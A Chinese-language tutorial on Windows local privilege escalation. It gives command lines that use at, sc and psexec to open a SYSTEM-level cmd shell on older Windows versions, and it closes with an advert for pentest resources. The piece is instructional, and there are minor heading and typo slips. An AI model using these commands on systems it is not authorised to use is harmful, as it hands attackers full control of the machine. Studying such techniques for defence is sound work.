一、AT命令
适用范围: Windows2000、Windows 2003、Windows XP
1.1 AT命令简介
AT命令是Windows XP中内置的命令,它也可以媲美Windows中的“计划任务”,而且在计划的安排、任务的管理、工作事务的处理方面,AT命令具有更强大更神通的功能。AT命令可在指定时间和日期、在指定计算机上运行命令和程序。
因为AT命令默认是以system权限下运行的所以我们可以利用以下命令,进行提权。
1.2 AT命令提权实验
系统:windows2003
命令:
at 13:38 /interactive cmd.exe #在13:38以system权限打开cmd
等到13:38 cms打开,权限是system权限,提权成功。
二、SC命令
适用范围: 适用于windows 7/8、03/08、12/16
2.1 SC命令简介
因为at命令在win7,win8等更高版本的系统上都已经取消掉了,所以在一些更高版本的windows操作系统上我们可以用sc命令进行提权,下面是sc的百度解释。
SC命令是XP系统中功能强大的DOS命令,SC命令能与“服务控制器”和已安装设备进行通讯。SC是用于与服务控制管理器和服务进行通信的命令行程序。
通俗理解就是 SC 可以启动一个服务。
2.2 AT命令提权实验
系统:windows2003
命令:
sc Create systemcmd binPath= "cmd /K start" type= own type= interact
#其中systemcmd是服务名称,大家可以随意填写,binpath是启动的命令,type=own是指服务这个服务属于谁,type=interact。
#这里再解释一下 cmd/k start 这个命令,这个命令就是启动一个新的cmd窗口。
sc start systemcmd #启动服务!
三、PS命令
适用范围: 适用于Win2003 & Win2008
微软官方工具包: https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools
2.1 PS命令提权实验
psexec.exe -accepteula -s -i -d cmd.exe
更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注
本文链接:http://m.zhangshiyu.com/post/37897.html